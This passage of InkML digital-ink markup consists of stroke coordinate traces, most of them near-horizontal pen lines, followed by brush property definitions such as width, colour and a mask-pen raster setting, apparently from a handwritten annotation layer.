17 31,141-35-31,-35 0 15,36 0-15,34 0 16,71 0-16,36 0 16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0.3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64 4372,'18'0,"0"0,19 0,17 19,73 17,-36-36,18 0,36 0,-36 0,36 0,-18 0,18 0,-36 0,-55 0,1 0,-19 0,-18 0,0 0,18 0,-17 0,-1 0,0 0,0 0,-18 18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12.0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26 14199 0,'-17'0'47,"-19"0"-32,19-17-15,-1-1 78,36-17-78,88 17 16,35-35-16,53 0 16,0 18-16,-18 17 15,1 1-15,52-19 16,-17 19-16,-36 17 15,36 0-15,-1 0 16,1 0 0,-53 0-16,17 0 15,-70 0-15,0 0 16,-36 0-16,-34 0 16,-19 0-16,1 0 15,0 0 1,-1 0-1,1 0 1,-1 0 47,19 0-48,17 0-15,17 0 16,-17 0-16,-35 0 15,-1 0-15,1 0 32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12.9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65 14217 0,'17'0'0,"1"0"15,17 0-15,1 0 16,-19 0-16,1 0 16,35-18-16,-18 18 15,18-17-15,18 17 16,-1-18-16,18 0 15,-17 18-15,-36 0 16,36 0-16,-54 0 16,19 0-1,-1 0-15,-35-17 16,18 17 0,-1 0-16,1 0 15,17 0 1,0 0-1,71 0 1,-35 0-16,-18 0 16,-18 0-16,0-18 15,1 18-15,-19 0 16,-17-18 0,18 18-16,-1 0 15,-17-17-15,18 17 16,-18-18-16,0 1 15,18 17 1,-18-18 0,17 0 15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15.4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558 14199 0,'52'0'109,"1"0"-109,53 0 16,18 0-16,34 0 16,36 0-16,-35 0 15,18 0-15,-1 0 16,-35 0-16,-17 0 15,17 0-15,-18 0 16,-17 0-16,17 0 16,1 0-16,-36 0 15,36 0-15,-1 0 16,-17 0-16,17 0 16,1 0-16,17 0 15,-18 0-15,-17 0 16,0 0-1,-35 0-15,-1 0 0,-17 0 16,-18 0-16,89-17 31,-107 17-15,1 0 15,0-18-15,-1 18-16,36 0 15,-17 0-15,34-18 16,1 18-16,-1 0 16,36 0-16,-18 0 15,0 0-15,18 0 16,-35 0-16,17 0 16,0 0-16,0 0 15,1 0-15,16 0 16,-16 0-16,52 0 15,0 0-15,0 0 16,0 0-16,0 0 16,0 0-16,-17 0 15,-18 0-15,-36 0 16,1 0-16,-36 0 16,0 0-16,-17 0 15,0 0-15,-1 0 16,1 0-16,35 0 15,-18 0-15,0 18 16,-17 0-16,17-18 16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32.5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98 9331 0,'0'-18'46,"18"18"-14,35 0-32,18 0 15,52 0-15,-35 0 16,0 0-16,18 0 16,-53 0-1,-18 0-15,1 0 0,-19 0 16,1 0-16,0 0 78,-1 0-16,1 18-15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6:33.6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45 10724 0,'18'0'125,"17"0"-109,1 0-16,17 0 15,17-17-15,1 17 16,17 0-16,0 0 16,0 0-16,0 0 15,18 0-15,18 0 16,-36 0-16,-18 0 15,-17 0-15,0 17 16,-35-17-16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18.5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579 8326 0,'18'0'31,"0"0"-16,17 0-15,-17 0 16,17 0-16,0 0 16,0 0-16,18 0 15,18 0-15,-18 0 16,17 0-16,18 0 16,-35 0-16,0 0 15,0 0-15,35 0 31,124 0 1,-159 0-32,0 0 0,0 0 15,0 0-15,0 17 16,-18-17-16,0 0 16,-17 0-1,17 0-15,0 0 0,1 0 31,-19 0-31,19 0 16,-1 0-16,35 0 16,36 18-16,-35-18 15,52 35-15,-35-35 16,36 18-16,-1-1 16,19 19-1,87-36-15,-141 17 16,18 1-16,-36 0 15,36-1-15,-35-17 16,17 0-16,18 18 16,17-18-1,-17 0-15,35 0 0,0 0 16,18 17-16,-71-17 16,1 0-16,-19 0 15,-17 0-15,18 0 16,17 0-16,-35 0 15,0 0-15,-1 0 16,-16 0-16,17 0 16,-18 0-16,-17 0 15,-1 0-15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26.9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85 6332 0,'36'0'63,"-19"0"-63,1 0 15,0 0 1,-1 0-16,19 0 16,-19 0-16,18 0 15,1 0-15,-19 0 31,19 0-31,-19 0 0,19 0 16,-19 0-16,18 0 16,18 0-1,0 0-15,-17 0 16,34 0-16,1 0 16,-18 0-16,35 0 15,-35 0-15,0 0 16,0-17-16,-36 17 15,1 0-15,-18-18 16,17 18-16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29.6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361 6015 0,'17'0'78,"1"0"-78,35 0 16,-18 0-1,36 0-15,35 0 16,0 0-16,52 0 16,1 0-16,0 17 15,17 1-15,-17 17 16,-18-17-16,-18 0 15,-70-18-15,-17 0 16,-19 0-16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30.5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783 6121 0,'17'0'47,"36"0"-31,18 0-16,17 0 15,88 0-15,-34 0 16,34 0-16,18 0 16,0 0-16,35 0 15,-17 0-15,17 0 16,-35 0-16,-35 0 15,-35 17 1,-36 1-16,-35 0 0,0-18 16,-36 0-1,1 0 1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31.5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92 6209 0,'0'18'16,"36"-18"15,17 0-31,-1 0 16,37 0-16,17 0 15,35 0-15,53 0 16,-36 0-16,19 0 16,-1 0-16,-35 0 15,36 0-15,-36 0 16,18 0-16,-36 0 15,18 0-15,-35 0 16,17 0-16,-17 0 16,-35 0-16,-1 0 15,1 0-15,35 17 16,-53-17-16,35 18 16,35-1-16,-34 1 15,16 0-15,1 17 16,-53-35-16,0 18 15,-35-18-15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2.8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01 4445,'0'0,"18"0,1 0,-1 0,18 0,18 0,1 0,36 0,-1 0,19 0,0 0,18 0,36 0,19 0,-19 0,-18 0,0 0,0 0,1 0,-19 0,18 0,-18 0,18 0,-36 0,18 0,0 0,0 0,36 0,-109-36,92 36,-19 0,0 0,-37 0,-17 0,36 0,-55 0,19 0,-19-18,1 18,-1 0,-36 0,0 0,0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37.9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57 13564 0,'-18'0'78,"-17"0"-62,-18 0-16,-18 0 15,1 0 1,-1 0-16,-35 0 0,18 0 16,18 0-16,-18 0 15,35 0-15,17 0 16,19 0 0,-1 0 46,0 0-31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40.9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74 13547 0,'17'0'78,"19"0"-62,-1 0-16,0 0 15,18 0-15,-18 0 16,36 0 0,0 0-16,-1 0 15,18 0-15,0 0 16,1 0-16,17 0 16,-36 0-16,1 0 15,-1 0-15,-35 0 16,36 0-16,52 0 15,248 0 32,-301 0-47,1 0 0,-18 0 16,17 0-16,-17 0 16,18 0-16,0 0 15,17 0 1,35 0-16,424 0 31,-388 0-31,-1 0 16,-16 0-1,-1 0-15,-35 0 0,-18 0 16,-18 0 0,18-18-16,-17 0 15,0 18-15,34 0 16,-34 0-16,17 0 15,18 0-15,-18 0 16,-17 0-16,35 0 16,88 0-1,-106 0-15,0 0 16,35 0-16,19 0 16,-1 0-16,0 0 15,35 18-15,-52 0 16,-36-18-16,-18 0 15,-17 0-15,0 0 16,-17 0-16,16 0 16,1 0-16,0 0 15,18 0-15,-1 0 16,19 0-16,-1 0 16,35 0-16,-35 0 15,36 0-15,-36 0 16,18 0-16,-18 0 15,-17 0-15,-1 0 16,36 0-16,-35 0 16,17 0-16,35 0 15,-35 0-15,36 0 16,-18 0 0,0 0-16,-1 0 15,-16 0-15,17 0 16,-18 0-16,35 0 15,-17 0-15,0 0 16,-18 0-16,18 0 16,88 0-1,-159 0-15,0 0 16,-17 0-16,17 0 16,-17 0-16,0 0 15,-1 0-15,1 0 16,17 0-1,0 0-15,1 0 0,17 0 16,-18 17-16,0 1 16,18-18-16,-18 18 15,36-1-15,17 18 16,-17-17-16,-18-18 16,-36 0-16,1 0 46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7:51.7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81 16616 0,'0'-18'93,"17"18"-77,1 0 0,17 0-16,18 0 15,0 0-15,35 0 16,-35 0 0,18 0-16,-36 0 15,0 0-15,1 0 16,17 0-16,17-17 31,-35 17-31,18 0 0,0 0 16,0 0-16,-18 0 15,-17 0-15,0 0 16,-1 0 0,1 0-1,17 0 1,-17 0 62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9:17.1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73 16728,'18'0,"19"0,-19 0,36 0,19 0,-1 0,37 0,0 0,0 0,0 0,18 0,0 0,0 0,18 0,-54 0,18 0,-19 0,1 0,18 0,-37 0,1 0,-19 0,19 0,-19 0,1 0,-19 18,0-18,19 0,17 0,-17 0,-1 0,37 0,0 18,18-18,-19 0,1 18,-18-18,35 0,1 0,-36 0,-19 0,1 0,-19 18,-18-18,18 0,-17 0,-1 0,0 0,0 0,0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05.8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186 4480 0,'17'0'31,"1"0"0,35 0-31,17 0 16,19 0-16,16 0 16,1 0-16,-18 0 15,54 0-15,-19-17 16,1-19-16,-36 36 15,35-17-15,1-1 16,-18 18-16,-18 0 16,18 0-16,-18 0 15,0 0 1,18 0-16,-18 0 16,18 0-16,-36 0 15,19 0-15,-37 0 16,37 0-16,-36 18 15,35-18-15,-18 17 16,36-17-16,-18 18 16,1-18-16,-19 0 15,18 0-15,18 0 16,0 0-16,0 0 16,-18 0-16,18 18 15,-18-1-15,18 1 16,-53-18-16,17 0 15,-34 18-15,17-18 16,-36 0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09.5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05 11042 0,'17'0'15,"19"0"-15,-1 0 16,18 0-16,0 0 31,88 0-31,-88 0 16,17 0-16,18 35 0,-35-17 15,53 17-15,-53-17 16,53-1 0,-53 19-16,53-19 15,-53 1-15,17-18 16,-17 18-16,0-18 16,0 0-16,0 0 15,0 0-15,0 0 16,17 0-16,1 0 15,-18 0-15,0 0 16,-18 0-16,88 0 31,-70 0-31,-17 0 16,-1-36-16,18 36 16,0-35-1,35 17-15,-18 1 0,71-1 16,1 0-16,16 1 15,54 17 1,17 0-16,-17 0 16,17 0-16,1 35 0,-1 18 15,0-35 1,-17 17-16,0-17 0,-36 17 16,0-35-1,18 0-15,-35 0 16,0 0-1,141 0-15,-194 0 16,35 0-16,-36 0 16,-16 0-16,-36 0 15,17 0 1,-70 18 93,18-18-77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31.9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42 10971 0,'18'0'15,"35"0"-15,0 0 16,35 18 0,-18-18-16,19 0 0,16 0 15,-16 0-15,34 0 16,-35 0-1,53 0-15,1 0 16,-1 0-16,35 0 0,-17-18 16,-18-17-1,35 17-15,18-17 16,-35 18-16,35-1 0,-35 18 16,35 0-1,-18 0-15,1 0 16,-19 0-16,-16 0 15,-19 0-15,-35 0 16,18 0-16,-18 0 16,18 0-16,-35 0 15,17 0-15,0 0 16,53 0-16,18 0 16,-18 0-16,0 0 15,0 0-15,36 0 16,-36 0-16,0 0 15,-18 0-15,18 0 16,-52 0-16,34 0 16,-17 0-16,0 0 15,0 0-15,-1 0 16,-16 0-16,-1 0 16,-18 0-16,1 0 31,17 0-31,-53 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34.3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910 12876 0,'0'0'0,"36"-17"16,-19 17 0,19 0-1,-19-18 1,1 18-16,0 0 15,-1-18-15,18 1 16,-17 17-16,0 0 16,-1 0-1,19-18 1,17 1-16,-1-1 0,-16 18 16,299 0 15,-194 0-31,18 0 0,35 0 15,-35 0 1,35 0-16,0 0 16,123 0-1,-141-35-15,-34 35 16,-1 0-16,-18 0 16,18 0-16,18 0 15,-18 0-15,18 0 16,17 0-16,-35 0 15,1 0-15,-37 0 16,19 0-16,-1-36 16,18 19-16,36-1 15,-36 0-15,0 18 16,18 0-16,35 0 16,-53 0-16,0-17 15,0 17-15,-17 0 16,-36 0-16,35 0 15,-35 0-15,36 0 16,-1 0-16,1 0 16,-18 0-16,17 0 15,1 0-15,-19 0 16,19 0-16,-1 0 16,-34 0-16,52 0 15,-18 0-15,36 0 16,17 0-16,-17 0 15,0 0-15,17 0 16,36 0-16,0 0 16,35 0-16,17 0 15,-17 0 1,35 0-16,-52 0 16,17 0-16,-18 0 15,-18 0-15,-34 0 16,17 0-16,18 0 15,-18 0-15,-36 0 16,195 0 0,-212 0-16,0 0 15,18 0 1,53 0-16,-89 0 31,-87 0-31,-19-18 16,1 18-1,-1 0 1,19-17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44.8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04 4551 0,'-18'0'16,"1"0"15,-1 0-31,0 0 16,1 0-1,-36 0-15,0 0 16,-18 0-16,1 0 15,-18 17-15,-1-17 16,1 0-16,0 0 16,0 0-16,17 0 15,18 0-15,0 0 16,18 0 0,0 0-16,17 0 0,1 0 15,-1 0 48,0 0-48,1 0 1,-19 0 0,19 0-1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46.1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48 4710 0,'0'0'0,"-158"0"0,34 0 16,1 0-16,70 0 15,17 0-15,19 0 110,-1 0-79,1 0-31,-36 0 15,0 0-15,0 0 16,-35 0-16,-1 0 16,1 0-16,-35 0 15,-1 0-15,36 0 16,17 0-16,-17 0 16,53 0-16,0 0 15,17 0-15,-17 0 16,-18 0-16,0 0 15,0 0-15,-17 0 16,34 0-16,-17-18 16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3.5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699 4481,'54'0,"1"37,-19-37,-18 0,0 18,37-18,-19 0,37 0,17 0,19 0,18 0,0 0,0 0,18 0,-36 0,0 0,-54 0,-19 0,-54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8:47.2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434 4216 0,'0'0'0,"-35"0"16,-18 0-16,18 0 15,-1-18-15,1 18 16,0 0 0,-1-18-16,1 18 15,0 0-15,17 0 16,1 0-16,-1 0 16,0 0-1,1 0 1,-19 0-16,1-17 15,-18 17-15,-35 0 16,-35 0-16,-19 0 16,-16 0-16,17 0 15,-1 0-15,1 0 16,18 0-16,-1 0 31,89 0-31,17 0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49:48.2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10 9507 0,'0'18'31,"18"0"-15,17-18 0,0 0-1,1 17-15,122 1 32,-87-18-32,-18 0 15,0 0-15,17 0 16,-34 0-16,-1 0 15,0 0-15,-17 0 16,0 0-16,-1 0 16,1 0 46,-1 0-46,1 0-1,17 0-15,-17 0 16,17 0 0,1 0-16,-1 0 15,18 0-15,17 0 16,19 35-16,-19-17 16,36 17-16,-36-35 15,-17 35-15,-17-35 16,-19 18-1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0:41.9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8 4463 0,'17'0'94,"19"0"-78,17 0-16,35 0 15,0 0-15,53 0 16,0 0-16,36 0 16,-1 0-16,-35 0 15,0 0-15,-17 0 16,-1 0-16,-35 0 16,-17 0-16,-18 0 15,-18 0-15,-17 0 16,-1 0-1,1 0 1,0 0 15,-1 0 1,1 0-32,17 0 15,1 0-15,-1 0 16,-18 0-16,19-18 15,17 18-15,-18 0 16,35 0-16,-17 0 16,0 0-16,0 0 15,-18 0-15,18 0 16,-17 0-16,17 0 16,-18 0-16,0 0 15,0 0-15,-17 18 16,0-18-16,-1 0 140,19 0-140,-1 0 16,0 0-16,0 0 16,1 0-16,-1 0 15,-17 0-15,-1 0 16,1 0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0:37.2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197 1852 0,'0'0'0,"70"0"15,18-18-15,1 1 16,34-1-16,1 1 16,-1-1-16,1 0 15,-1 1-15,36-1 16,-18 0-16,0 18 16,18-17-16,-1 17 15,178 0 1,-160 0-1,18 0-15,18 0 0,-54 0 16,54 0-16,53 0 16,-124 35-16,-106-17 15,-17-18-15,17 0 16,-17 17 15,17 1-31,0 0 16,-17-1-1,-1 1-15,54 17 16,-36-35-16,-17 18 16,0-1-16,70-17 15,0 36-15,-18-1 16,-34-17-16,52 17 16,-53 18-16,1-36 15,87 19-15,-17-1 16,-89-35-16,72 0 31,17 0-31,-36 0 16,71 106-16,-53-36 15,-35-34-15,18-19 16,-1 1-16,-17 0 16,0-18-16,0 17 15,0 1-15,-18-1 16,-17-17-16,0 0 31,-1 0 32,1 0-48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0:38.9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885 1711 0,'0'0'0,"35"-18"16,-17 18-16,17-17 15,18 17-15,17 0 16,18 0-16,36 0 15,35 0-15,17 0 16,18 0-16,18 0 16,35 0-16,-18 0 15,0 0-15,36 0 16,-36 0 0,18 0-16,-35 0 0,-18-18 15,0 0-15,18 18 16,-36-17-16,18 17 15,18 0-15,17 0 16,35 0 0,54 0-16,-71 0 15,53 0-15,35 0 16,18 35-16,17 18 16,36 0-16,0-18 15,-142 18-15,18-18 16,-17 18-16,-53-35 15,-18 0-15,-53-18 16,-35 0-16,-1 0 16,-16 0-16,-36 0 15,35-18-15,-53 0 16,18 1-16,-18 17 16,0 0-16,36 0 15,35 0-15,-18 0 16,-17 0-16,-1 0 15,1 0-15,-1 0 16,-17 0-16,0 0 16,-35 0-16,-1 0 15,36 0 1,-35-18 109,0 0-109,-1 1-1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0:57.1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0 7161 0,'0'18'110,"18"-18"-110,-18 18 15,18-18-15,17 0 16,0 17 0,1-17-16,404 88 46,-298-88-46,-19 0 0,1 0 16,-72 0 0,19 0-16,-36 0 15,1 0-15,-19 0 16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0:58.5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41 7056 0,'35'0'94,"54"0"-79,-1 0-15,35 0 16,18 0-16,36 0 16,-19 0-16,19 0 15,-1 0-15,-17 0 16,0 0-16,35 0 15,0 0-15,-53 17 16,-18-17-16,-17 0 16,35 0-16,-17 0 15,-1 0-15,1 0 16,35 0-16,-1 0 16,19 0-16,34 0 15,-17 0-15,18 0 16,35 0-16,-18 0 15,-17 0-15,0 0 16,282 0 15,-389 0-31,1 0 16,-53 18-16,-35-18 0,35 17 16,-53 1 46,17-18-46,-17 18 14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14.0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70 9349 0,'-18'17'62,"36"-17"-62,17 18 16,36-18-16,-1 18 15,54-18-15,17 0 16,18 0-16,35 0 16,-18 0-16,0 0 15,1 0 1,-54 0-16,1 0 0,-36 17 16,0-17-16,-53 18 15,-17-18 16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15.2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38 7003 0,'18'0'15,"35"0"-15,35 0 16,-18 0-16,54 0 16,-18 0-16,0 0 15,17 0-15,0 0 16,-34 0-16,34 0 15,1 0 1,-36 0-16,53 0 0,-18 0 16,18 0-16,-17 0 15,-18 0 1,0 0-16,-18 0 0,0-18 16,0 18-1,-35 0-15,18 0 16,-1 0-16,1 0 15,-1 0-15,-17 0 16,35 0-16,-17 0 16,-18 0-16,0 0 15,-36 0-15,19 0 16,-19 0-16,1 0 16,0 0-16,17 0 15,0 0-15,18 0 16,0 0-16,-18 0 15,18 0-15,-35 0 16,0 0-16,-1 0 16,1 0 15,-4075 0 47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19.0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45 9243 0,'17'0'31,"1"17"0,0 1-15,-1-18-16,18 0 15,18 0-15,0 0 16,35 0-16,18 0 16,0 0-16,35 0 15,-17 18-15,17 17 16,0-17-16,-18-1 16,19 1-16,34 0 15,-35-1-15,53 36 16,-35-35-16,17-1 15,-17 1-15,-18-18 16,0 0 0,-53 0-16,18 0 0,-18 0 15,1-18 1,-54 1-16,35-1 16,-52 18-16,35-18 15,-35 1-15,-1 17 16,1 0-16,-1 0 15,19 0-15,17 0 16,17 0-16,195 0 31,-124 17-31,318 72 16,-107-36 15,-316-53-15,-1 0-16,0 0 15,-17 17-15,-1-17 16,19 18-16,-1-18 16,0 17-16,-17-17 15,17 0-15,18 18 16,-18 0-16,18-18 31,-35 0-31,17 0 16,18 0-16,-35 0 15,-1 0-15,19 0 16,-1-18-16,18 18 16,-35 0-16,17-18 15,0 1-15,18-1 16,-35 18-16,-1 0 16,36-17-16,0-1 15,35-17-15,-17 35 16,35-36-16,17 19 15,-35-1-15,18 18 16,-18 0-16,-17 0 16,35 0-16,-36 0 15,36 0-15,-18 35 16,36 1-16,-18-1 16,17 0-16,-70-35 15,35 0-15,0 18 16,1-18-16,-19 0 15,-17 0-15,0 0 16,-18 0-16,1-18 16,-19 18-1,-17-17-15,18-1 32,0 18-17,-1 0 48,18 0-63,18 0 15,18 0-15,17 0 16,-17 0-16,17 0 16,-18-18-16,1 1 15,-18 17-15,-18-18 16,36 18-16,-54 0 15,19 0 1,-36-18 156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4.5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49 5860,'0'0,"19"0,-1-18,18 18,0 0,1 0,53-18,1-18,54 17,0 1,-18 18,37 0,-19 0,-55 0,1 0,-55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45.8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23 11553 0,'17'0'78,"54"0"-78,-18 0 16,17 0-1,54 0-15,-1 0 16,1 18-16,17 35 16,-35-53-16,17 18 15,-35-18-15,36 0 16,-18 0-16,17 17 15,1-17-15,17 18 16,-71-18-16,36 0 16,-88 0-16,-1 0 15,1 0 63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47.4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64 14552 0,'18'0'63,"70"0"-48,35 0-15,36 0 16,0 0-16,17 0 15,-17 0 1,-18 0-16,-18 0 0,1 0 16,-54 0-1,19 0-15,16 0 16,-52 0-16,-17 0 16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48.3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76 16845 0,'88'0'109,"53"-17"-109,35-19 16,18 1-16,-17 17 16,-36 18-16,35-17 15,-35 17-15,-17 0 16,-54 0-16,-17 0 15,-18 0-15,-17 0 16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53.0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69 11483 0,'35'0'47,"53"0"-47,53 0 15,36 0-15,70 0 16,35 0-16,53 0 16,0 0-16,53 0 15,-105 0-15,16 0 16,-34 0-16,-36-18 15,-35-17-15,-53 17 16,-70 18-16,-53 0 31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54.8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97 14552 0,'0'0'0,"141"18"15,54-1-15,16 36 16,36-17-16,0-36 16,18 35-16,52 18 15,-17-36-15,-71-17 16,71 0-16,-18 0 15,54 0-15,52 0 16,53 0-16,35 0 16,-35 0-16,-18 0 15,-35 0-15,-53 0 16,0 0-16,-35 0 16,-53 18-16,-35-18 15,0 0-15,-1 0 16,-34 0-16,-19 0 15,-34 0 1,-36 0-16,-35 0 0,0 0 16,-35 0-16,17 0 15,-18 0 1,1 0 15,0 0 94,-1 0-125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0T07:51:56.0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046 17057 0,'0'0'0,"-35"-18"15,-18 1-15,0 17 16,-53-36-16,35 19 16,-52-1-16,0 18 15,17 0-15,-71 0 16,19 0-16,-72 0 16,-17 0-16,18 0 15,-18 0-15,-35 0 16,-18 0-16,-35 0 15,0 0-15,-18 0 16,-18 0-16,19 0 16,-19 0-16,19 0 15,16 0-15,89-18 16,36 18-16,17 0 16,35 0-16,36 0 15,-1 0-15,36 0 16,-18 0-16,0 0 15,-17 0-15,-1 0 16,1 0-16,35 0 16,-36 0-16,18 0 15,-52-17-15,52 17 16,-35 0 0,-36-18-16,18 0 15,-35-34-15,53 34 16,18 0-16,70 18 15,35 0-15,1 0 16,-1 0 0,0 0-16,-70-17 31,53 17-31,17 0 16,-17 0 109,17 0-110,1-18-15,-19 18 16,19-18 15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1:00.9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57 335 0,'-18'0'31,"-34"18"-31,-37 17 15,-52 71-15,0-36 16,0 36-16,-18 18 16,1 52-16,16 18 15,19 35-15,-1 36 16,72-53-16,-1 35 16,53-36-16,0 1 15,17 17-15,71 18 16,89 71-16,35-54 15,211-105 1,-159-159-16,54 0 16,-89-53-16,36 18 15,-18 17 1,-36-17-16,-17 17 16,-52-17-16,-54 35 15,-35-35-15,-18-1 16,-35 19-16,0-18 15,0-36-15,0-17 16,-88-53-16,-36 0 16,-52-142-16,0 89 15,-71-123-15,0 52 16,17 54-16,54 52 16,0 0-16,-1 18 15,18 0-15,54 35 16,-1 0-16,35 36 15,36 17-15,-18 0 16,53 88 31,0 106-47,0 53 16,0 53-16,0 124 15,35-19-15,36 160 16,-18-106-1,35-36-15,-53-52 0,71 17 16,-71-124 0,1-17-16,-19 0 15,-17-70-15,0-36 16,0 18-16,0-71 16,0 0-16,-35-17 15,35 0-15,-35-36 63,-18-70-63,-18-36 15,-17-52-15,17-18 16,-70-88-16,-70-89 16,-54-105-16,-35-88 15,36 140 1,17 1-16,53 17 0,105 106 15,19-17-15,52 88 16,18-36-16,0 36 16,36 70-16,-1 159 15,35 0 1,-17 0-16,-35 0 0,17 0 16,1 0-16,-1 0 15,-18 0 1,19 0-1,-1 18 1,-17-1-16,-1-17 16,1 18-16,0 0 15,17-1-15,-18-17 16,1 0 15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13.6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72 14206,'18'0,"37"0,-1 0,37 0,18 0,-19 0,37 0,0 0,19 0,-38 0,19 0,0 0,19 0,-19 0,18 0,-55 0,37 0,-54 0,0-18,-19 0,19-19,17 37,-17 0,36-18,18 18,18 0,0 0,18 0,37 0,-19 0,37 0,54 0,-54 0,36 0,-18 0,36-18,0 18,-36 0,18 0,-18 0,-37-18,19 18,-55 0,19 0,-19 0,37 0,-55-18,0 18,18 0,19 0,-19-18,-36 18,18 0,0 0,-18 0,-18 0,36 0,-18 0,18-19,0 19,-18 0,19 0,-19 0,18 0,-36 0,36 0,-18 0,18 0,-18-18,0 18,0-18,-55 18,1 0,-19 0,1 0,-19 0,19 0,-19 0,0 0,0 0,19 0,-1 0,1 0,-19 0,0 0,-18 0,1 0,-1 0,0 0,0 0,0 0,0 0,0 0,-18 18,19-18,-1 0,0 0,0 0,0 0,0 0,19 0,-19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15.5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526 14260,'18'0,"0"0,19 0,-19 0,18 0,-18 0,19 0,17 0,0 0,19 0,-19 0,19 0,18 0,-1 0,19 0,-54 0,-1 0,1 0,-19 0,-18 0,18 0,-18 0,1 0,-1 18,0-18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16.2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556 14623,'18'0,"18"0,1 0,17 0,-18 0,37-18,18 18,18 0,-37 0,55 0,-54 0,17 0,-17 0,-19 0,-17 0,-19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7.3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02 5679,'36'0,"55"0,36 0,18 0,18 0,19 0,72 0,18-18,-36-1,-19 19,19 0,36 0,-108 0,-37 0,-37 0,-53 19,-19-19,0 0,18 0,0 18,1-18,-19 18,0-18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18.4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78 11811,'0'0,"37"0,17 0,1 0,-1 18,37-18,-1 0,56 0,-1 0,18 0,55 0,-37 0,-18 0,37 0,-37 0,1 0,-56 18,-17-18,-18 0,-55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20.0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42 12011,'0'-19,"36"19,0 0,-18 0,37 0,-1 0,-18 0,19 0,17 0,19 0,-18 0,-19 0,19 0,-19 0,1 0,-19 0,18 0,-17 0,-19-18,0 18,-36 0,0 0,-1 0,1 0,0 0,-18 0,0 0,-19 0,-17 0,-19 0,-18-18,18 18,-36 0,0 0,-18 0,0 0,-18 0,-55 0,0 0,-18 0,1-18,35 18,0-36,1 18,36 18,36-19,0 19,54 0,-18-18,1-18,17 36,0-18,-17 0,17 18,1-18,-37 18,18-19,37 19,-1 0,19 0,0 0,-19 0,19 0,18 0,0 0,-19 0,19 0,0 0,-36 0,35 0,-17 0,18 0,0-18,-18 18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21.2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977 11847,'54'0,"0"0,19 0,18 0,-19 0,55 0,0 0,18 0,-36 0,18 0,0 0,-36 0,36 0,-54 0,-19 0,0 0,1 0,-37 0,36 0,-35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21.9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988 11902,'18'0,"1"0,-1 0,18 0,37 0,35 0,1 0,55 0,-56 0,38 0,-1 0,-18 0,18 0,-18 0,-18 0,0 0,-37 0,19 0,18 0,-37 0,-54 0,19 0,-19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23.4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959 11847,'-18'0,"0"0,54 0,19 18,36-18,17 0,1 0,18 0,18 0,1 0,35 0,-18 0,19 0,-1 0,-18 0,19 19,-19-1,-18-18,0 0,19 0,17 0,-36 18,19-18,-37 0,0 0,-19 0,-17 0,0 0,-19 0,19 0,18 18,0-18,-18 18,17-18,-35 0,18 0,-19 0,1 0,-37 0,19 0,-37 0,0 0,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25.0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27 13045,'36'0,"1"0,35 0,-17 0,35 0,55 0,55 0,0 0,-37 0,-36 0,-18 0,-37 0,-17 0,-1 0,1 0,-19 0,18 0,-36 0,19 0,-19 0,0 0,0 0,0 0,0 0,1 0,17 0,18 0,1 0,35 0,19 0,0 0,36 0,0 0,-18 0,-18 0,-54 0,126 18,-36 0,-36 0,-36-18,-1 18,-17-18,-37 0,0 18,-18 1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7:41.1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123 13190,'0'-18,"18"0,36 18,37-19,-18 1,-1 18,1 0,-19 0,37 0,0 0,-1 0,1 0,18 0,18 0,-36 0,36 0,-55 0,19 0,-37 0,-17 0,-19 0,0 0,0 0,0 0,0 0,0 0,1 0,-1 0,0 0,0 0,18 0,-18 0,1 18,-1-18,0 0,0 0,0 0,18 0,-17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8:06.6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712 6912,'-18'0,"0"0,-1 0,19 19,-18-19,0 0,0 0,18 18,-18 0,0 0,0 0,-37 37,-17-1,35 0,-53 1,-1 17,36 55,-35-72,-1-37,37 18,-37 1,55-19,-1 0,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8:07.1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05 6912,'0'0,"36"19,0 35,19 37,-55-55,36 37,37-1,-1 1,19 17,-37-17,37-19,-37-17,37 17,-73-36,0-18,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26:22.103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1F497D"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">7856 7783,'18'0,"18"0,1 0,-1 0,18 0,37 0,0 0,36 0,18 0,0 0,55 18,-37-18,37 0,-37 0,18 0,-36 0,-54 0,-36 0,-19 0,-18 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2624.3818">11176 5407,'-18'0,"-36"18,-1 0,-17 18,-37-36,36 36,-18 19,1-1,35 1,-35-37,35 18,37-36,-18 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="3096.5633">10432 5280,'0'0,"0"18,0 18,18 0,19 37,-19-19,18 19,19 36,-19-37,0-17,0-1,-17 1,17-37,-18 0,-18 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="12696.4454">14660 9144,'0'18,"-37"37,19-19,-36 18,-1 19,-35 18,17-37,-18 19,37-37,18-18,-19 0,37-18,-18 0,18 0,-1 0,-17 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="13216.0299">14079 9253,'0'18,"18"-18,0 54,19-17,-1 35,55 1,-1-1,-17 19,36 0,-19 0,1-19,-36-36,17 19,-17-19,-1-36,-36 0,0 0,-18-18</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br1" timeOffset="14184.702">7620 9180,'0'0,"18"0,19 0,-19 0,0 0,0 0,0 0,18 0,19 0,-19 0,37 0,17 0,37 18,-36-18,72 19,19-19,17 18,1-18,54 0,-18 0,0 0,36 0,-18 0,-18 0,36 0,-73 0,-53 0,-74 0,-17 0,-55 18,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7:27.557"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.08819" units="cm"/>
      <inkml:brushProperty name="height" value="0.35278" units="cm"/>
      <inkml:brushProperty name="color" value="#B4CDE2"/>
      <inkml:brushProperty name="tip" value="rectangle"/>
      <inkml:brushProperty name="rasterOp" value="maskPen"/>
    </inkml:brush>
  </inkml:definitions>
